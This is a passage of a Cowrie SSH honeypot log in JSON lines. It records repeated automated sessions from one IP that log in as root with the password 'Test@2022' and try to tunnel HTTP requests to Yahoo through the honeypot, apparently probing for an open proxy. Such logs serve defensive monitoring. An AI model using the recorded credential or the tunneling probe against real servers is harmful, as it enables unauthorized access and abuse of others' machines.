istp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.171842Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.407121Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30349,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30349","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.455802Z","session":"52bc4923a99b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.503170Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":5291,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5291","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.637530Z","session":"52bc4923a99b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.684880Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.732940Z","src_ip":"213.209.150.239","session":"52bc4923a99b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27226,"dst_ip":"1.2.3.4","dst_port":22,"session":"61871675a836","protocol":"ssh","message":"New connection: 213.209.150.239:27226 (1.2.3.4:22) [session: 61871675a836]","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.788666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.789731Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:28.846479Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.129061Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1362,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1362","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.186477Z","session":"61871675a836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.243360Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22021,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22021","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.399034Z","session":"61871675a836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.455810Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.513161Z","src_ip":"213.209.150.239","session":"61871675a836"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27281,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e3a9345a3d7","protocol":"ssh","message":"New connection: 213.209.150.239:27281 (1.2.3.4:22) [session: 3e3a9345a3d7]","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.568997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.570226Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.626864Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.910136Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11867,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11867","sensor":"my-vps","timestamp":"2025-08-26T01:03:29.967812Z","session":"3e3a9345a3d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.024854Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12340,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12340","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.179158Z","session":"3e3a9345a3d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.236022Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.294399Z","src_ip":"213.209.150.239","session":"3e3a9345a3d7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27336,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1cc457f368","protocol":"ssh","message":"New connection: 213.209.150.239:27336 (1.2.3.4:22) [session: fa1cc457f368]","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.340612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.341605Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.388802Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.624418Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22176,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22176","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.672759Z","session":"fa1cc457f368"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.720247Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12541,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12541","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.857697Z","session":"fa1cc457f368"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.905247Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:30.954063Z","src_ip":"213.209.150.239","session":"fa1cc457f368"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27399,"dst_ip":"1.2.3.4","dst_port":22,"session":"474a5458c430","protocol":"ssh","message":"New connection: 213.209.150.239:27399 (1.2.3.4:22) [session: 474a5458c430]","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.009897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.010727Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.067462Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.350041Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1052,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1052","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.408865Z","session":"474a5458c430"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.465556Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":26987,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26987","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.619054Z","session":"474a5458c430"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.675727Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.733301Z","src_ip":"213.209.150.239","session":"474a5458c430"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27445,"dst_ip":"1.2.3.4","dst_port":22,"session":"bed33f6d0c52","protocol":"ssh","message":"New connection: 213.209.150.239:27445 (1.2.3.4:22) [session: bed33f6d0c52]","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.779491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.780353Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:31.827396Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.062513Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1132,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1132","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.110704Z","session":"bed33f6d0c52"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.158049Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26892,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26892","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.293594Z","session":"bed33f6d0c52"}
